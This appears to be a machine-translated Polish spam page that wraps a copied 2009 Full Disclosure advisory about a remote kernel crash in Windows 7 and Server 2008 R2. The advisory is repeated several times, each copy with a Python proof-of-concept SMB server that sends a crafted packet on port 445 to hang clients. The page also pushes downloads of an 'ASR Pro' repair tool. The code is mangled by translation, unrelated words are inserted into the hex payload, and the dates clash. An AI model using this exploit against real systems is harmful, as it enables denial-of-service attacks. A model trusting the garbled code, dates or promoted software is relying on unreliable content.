Zatwierdzono

  • 1. Pobierz ASR Pro
  • 2. Otwórz program i wybierz „Skanuj swój komputer”
  • 3. Kliknij „Napraw”, aby rozpocząć proces naprawy
  • Oprogramowanie do naprawy komputera to tylko jedno kliknięcie — pobierz je teraz.

    Jeśli zdalne jądro systemu Windows 7 / Server 2008r2 ulega awarii na Twoim komputerze, mamy nadzieję, że ten indywidualny przewodnik pomoże Ci rozwiązać ten problem. g.Nieskończona pętla klienta Microsoft Windows 7 lub Server 2008 R2 SMB: Wykorzystuje awarię wykonywania operacji w kliencie Microsoft Windows SMB w systemie Windows 7 lub nowszym Windows Server 2008 R2. Najczęściej zawodzi zdalne jądro. Metasploit Framework zawiera moduł do wykrywania mojej luki w zabezpieczeniach.

     

     

    g.

      numer! / usr / bin kontra python# win7-crash.Trigger py:# awaria zdalnego jądra zlokalizowana na serwerze hosta Win7 i 2008R2 (nieskończona pętla)# Awarie KeAccumulateTicks (), w których NT_ASSERT () / DbgRaiseAssertionFailure () przyczyniły się do# Niekończący się cykl.# BRAK BSOD, MUSISZ ODŁĄCZYĆ ZŁĄCZE.# Aby szybko to nazwać; w kolejności:  this_script_ip_addr  BLAH, awaria bez wysiłku# Autor: Laurent Gaffi¯ ¿ ½Importuj serwer gniazdPakiet jest równy (długość numeru " x00  x00  x00  x9a" ---> musi być zawsze 9, a nie 9a .." xfe  x53  x4d  x42  x40  x00  x00  x00  x00  x00  x00  x00  x00  x00  x01  x00"" x01  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00"" x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00"" x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00  x00"" x41  x00  x01  x00  x02  x02  x00  x00  x30  x82  xa4  x11  xe3  x12  x23  x41"" xaa  x4b  xad  x99  xfd  x52  x31  x8d  x01  x00  x00  x00  x00  x00  x01  x00"" x00  x00  x01  x00  x00  x00  x01  x00  xcf  x73  x67  x74  x62  x60  xca  x01"" xcb  x51  xe0  x19  x62  x60  xca  x01  x80  x00  x1e  x00  x20  x4c  x4d  x20"" x60  x1c  x06  x06  x2b  x06  x01  x05  x05  x02  xa0  x12  x30  x10  xa0  x0e"" x30  x0c  x06  x0a  x2b  x06  x01  x04  x01  x82  x37  x02  x02  x0a")Sesja SMB2 (SocketServer.BaseRequestHandler):  Def-Handle (sama):        wzorzec "Kto:", self.client_address        Użyj „Dzięki SDL”       Wpis sugeruje self.request.recv (1024)        self.request.send (pakiet)        samo.żądanie.zamknij ()uruchom = SocketServer.TCPServer (('', 445), SMB2) # słuchaj po wszystkich interfejsach miasto 445uruchom.serve_forever ()             

    Ten błąd jest interesującym dowodem na to, że SDL FAIL
    Cierpiącym na błąd jest nieograniczona pętla na smb1,2, wstępne uwierzytelnianie, wymagane są tylko pełne dane uwierzytelniające…
    Można uruchomić w sieci lokalnej przez (IE *)
    Błąd prawdopodobnie musi być tak prosty, że powinien zostać odkryty 2 lata temu na określonym SDL, jeśli SDL już istniał:

    netbios_header = struct.pack (“> i”, len (”. join (SMB_packet)) + SMB_packet
    (Tagi h2 netbios przekazują długość współczesnego pakietu smb1,2).

    Jeśli liczba netbios_header jest rzeczywiście o 4 bajty mniejsza lub większa niż SMB_packet, sytuacja jest po prostu haniebna!
    JAKI RODZAJ ?? Żartujesz sobie, gdzie jest mój SDL?!?

    windows 7 / serwer 2008r2 wiejskie awaria jądra

    “Najbezpieczniejszy system operacyjny do czynienia ze światłem. е “;
    To, że poprawnie skonfigurowano firewall, powinno być bardzo usunięte przez IE, nawet za pomocą metody rozgłaszania nbns (bez interakcji użytkownika)

    ================================================
    – Data wydania: 11 listopada 2009
    – Odkryte przez: Laurent Gaffier
    – Dotkliwość: średnia / niezwykła
    ==============================================

    windows 7 na serwer 2008r2 awaria zdalnego jądra

    NS. POTWIERDZENIE KONCEPCJI
    ————————–
    # win7-crash.py:
    # Uruchamianie prawdziwej odległej awarii jądra pod Win7, a tym samym Server 2008R2 (nieskończona pętla)
    # KeAccumulateTicks () uległ awarii z powodu NT_ASSERT () w porównaniu z DbgRaiseAssertionFailure () spowodowane przez # głęboką nieskończoną pętlę.
    # BEZ BSOD, MASZ KOREK.
    # Aby szybko się z tym zmierzyć; w kolejności: this_script_ip_addr BLAH, zmniejsz natychmiast
    # Wysłane przez Laurenta Gaffiera
    #

    Pakiet równa się (numer ” x00 x00 x00 x9a” —> 9-ty okres powinien tak naprawdę wynosić 9a ..
    ” xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00″
    ” x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
    ” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
    ” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
    ” x41 x00 x01 x00 x02 x02 x00 x00 x30 x82 xa4 x11 xe3 x12 x23 x41″
    ” xaa x4b xad x99 xfd x52 x31 x8d x01 x00 x00 x00 x00 x00 x01 x00 “
    ” x00 x00 x01 x00 x00 x00 x01 x00 xcf x73 x67 x74 x62 x60 xca x01″
    ” xcb x51 xe0 x19 x62 x60 xca x01 x80 x00 x1e x00 x20 x4c x4d x20″
    ” x60 x1c x06 x06 x2b x06 x01 x05 x05 x02 xa0 x12 x30 sony ericsson xperia x10 xa0 x0e”
    ” x30 x0c x06 x0a x2b x06 x01 x04 x01 x82 x37 x02 x02 x0a”)

    V. WPŁYW KOMERCYJNY
    ————————–
    Atakujący może zdalnie wyłączyć wiele serwerów Windows 2008R2 Server 7 dla każdego
    w sieci lokalnej lub przez IE

    VII. Rozwiązanie poprawki
    ————————–
    nigdy nie jest dostępny dla tej instancji, Twój dostawca usług internetowych nie dba o to.
    Zamknij funkcję SMB, ale także porty, dopóki nie zostanie wyświetlony prawidłowy audyt.

    X. HISTORIA ZMIAN
    ————————–
    8 listopada 2009: MSRC skontaktował się z
    Kilka listopada 2009: MSRC wykryła lukę w zabezpieczeniach
    18 listopada 2009: MRSC próbuje mnie przekonać, ponieważ istnieje błąd IPv6 od różnych dostawców, który naprawdę nie powinien pojawiać się w biuletynach bezpieczeństwa.
    11 listopada 2009: Ten cenny błąd został wydany.

    XI. UWAGI
    ————————–
    Zatwierdzone informacje zawarte w niniejszym dokumencie są dostarczane „tak jak są”
    bez oświadczeń mogą być gwarancje celowości lub inaczej.
    Nie powinienem akceptować żadnych uszkodzeń wprowadzonych przez operatora lub
    Nadużycie najczęściej związane z tymi informacjami.

    Pełne ujawnienieArchiwa list mailingowych

    Awaria zdalnego jądra Windows 7 Server 2008R2Od: laurent gaffie
    Data: gmail środa 11 listopada 2006 05:58:44 – 05:00
    ================================================- DATA wydania: 11 listopada 2009- Właśnie odkryto: Laurent Gaffier- Dotkliwość: średnia na wysoką.========================================================I. WRAŻLIWOŚĆ————————–Zdalna blokada jądra Windows jeden konkretny, * Server 2008R2II. KONTEKST————————–# FAIL, numer FAIL, # FAILSDL FAIL, „Najbardziej bezpieczny system operacyjny w historii” -> Zdalne jądro w kilka minut.# USZKODZENIE, # USZKODZENIE, # USZKODZENIEIII. OPIS————————–Zobacz: http://g-laurent.blogspot.com/, aby uzyskać znacznie więcej informacji i wiele szczegółów.# Komentarz: Ten błąd jest znany jako Windows 7 / 2008R2.NS. DOWODY KONCEPCYJNE————————–# win7-crash.py:# Uruchamianie kolejnej zdalnej awarii jądra pod Win7 oprócz serwera 2008R2 (nieskończona pętla)# KeAccumulateTicks () ulega awarii z powodu pomocy NT_ASSERT () / DbgRaiseAssertionFailure ()Summoningano niewyczerpana pętla.# BRAK BSOD, ODŁĄCZASZ ZŁĄCZE.# Do szybkiego uruchomienia z centrum na: this_script_ip_addr BLAH, natychmiastrozbić się#Autor: Laurent Gaffier#Importuj serwer gniazdPackage = ” x00 x00 x00 x9a” numer —> prawdopodobnie 9, a nie 9a.” xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00″” x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″” x41 x00 x01 x00 x02 x02 x00 x00 x30 x82 xa4 x11 xe3 x12 x23 x41″” xaa x4b xad x99 xfd x52 x31 x8d x01 x00 x00 x00 x00 x00 x01 x00″” x00 x00 x01 x00 x00 x00 x01 x00 xcf x73 x67 x74 x62 x60 xca x01″” xcb x51 xe0 x19 x62 x60 xca x01 x80 x00 x1e x00 x20 x4c x4d x20″” x60 x1c x06 x06 x2b x06 x01 x05 x05 x02 xa0 x12 x30 sony ericsson xperia x10 xa0 x0e”” x30 x0c x06 x0a x2b x06 x01 x04 x01 x82 x37 x02 x02 x0a”Sortowanie SMB2 (SocketServer.BaseRequestHandler): zarządzanie outl (automatyczne): „Kto:” Obraz, self.client_address Wpis sugeruje self.request.recv (1024) self.request.send (pakiet) samo.żądanie.zamknij ()Start zawiera SocketServer.TCPServer ((”, 445), numer SMB2) nasłuchujący na wszystkich portach445uruchom interface.serve_forever ()#SDL AWARIAV. BIZNES Atak głównego agresora————————–i może zdalnie zawiesić dowolny system Windows – / Server 2008R2.VI… SYSTEMY ZAREZERWOWANE————————–Windows 7, Windows 2008R2VII serwer. ROZWIĄZANIE————————–W tej chwili nie ma żadnej łatki, usługodawca nie przejmuje się tym.Zamknij pozycję i porty SMB do czasu przeprowadzenia prawdziwego audytu.VIII. BIBLIOGRAFIA————————–http://blogs.msdn.com/sdl/http://g-laurent.blogspot.com/http://twitter.com/g_laurentIX. Pożyczki————————–Ta luka została zaimplementowana przez Laurenta Gaffiera. odkrytyLaurent.gaffieremove-this (at) gmail.comX. HISTORIA REWIZJI————————–8 listopada 2009: skontaktowano się z MSRC.Listopad 2009: MSRC zidentyfikował znaczącą lukę w zabezpieczeniach.11 listopada 2009: MRSC próbuje przekonać się, że IPv6 od dostawców asortymentu to błąd.nie powinny pojawiać się w biuletynach bezpieczeństwa.11 listopada 2009: Wydano Win Remote 7 Kernel SmashXI. NOTA PRAWNA————————–Informacje zawarte w niniejszym ogłoszeniu są po prostu dostarczane „tak jak są”.bez gwarancji lub oferty użytkowania, a czasami w inny sposób.Nie ponoszę odpowiedzialności za zużycie i kopiowanie spowodowane użyciem z lubnadużywać tego typu informacji.XII Notatki osobiste————————–Więcej zdalnych jąder FD @MS pojawi się w przyszłości.

     ________________________________________________PłećMoje ujawnienie dokumentów - zaufaj już teraz.Karta: http://lists.grok.org.uk/full-disclosure-charter.htmlWłaśnie pozycjonowane i sponsorowane przez Secunia Http: // secunia-.com/ 

    Przez randki By Drut

    Bieżący strumień:

    • Windows Server 2008R2 Potężny zdalny awaria jądra autorstwa Laurenta Gaffy’ego (11 listopada)

    Zatwierdzone

    Narzędzie naprawcze ASR Pro to rozwiązanie dla komputera z systemem Windows, który działa wolno, ma problemy z rejestrem lub jest zainfekowany złośliwym oprogramowaniem. To potężne i łatwe w użyciu narzędzie może szybko zdiagnozować i naprawić komputer, zwiększając wydajność, optymalizując pamięć i poprawiając bezpieczeństwo procesu. Nie cierpisz już z powodu powolnego komputera — wypróbuj ASR Pro już dziś!


     

     

    Oprogramowanie do naprawy komputera to tylko jedno kliknięcie — pobierz je teraz.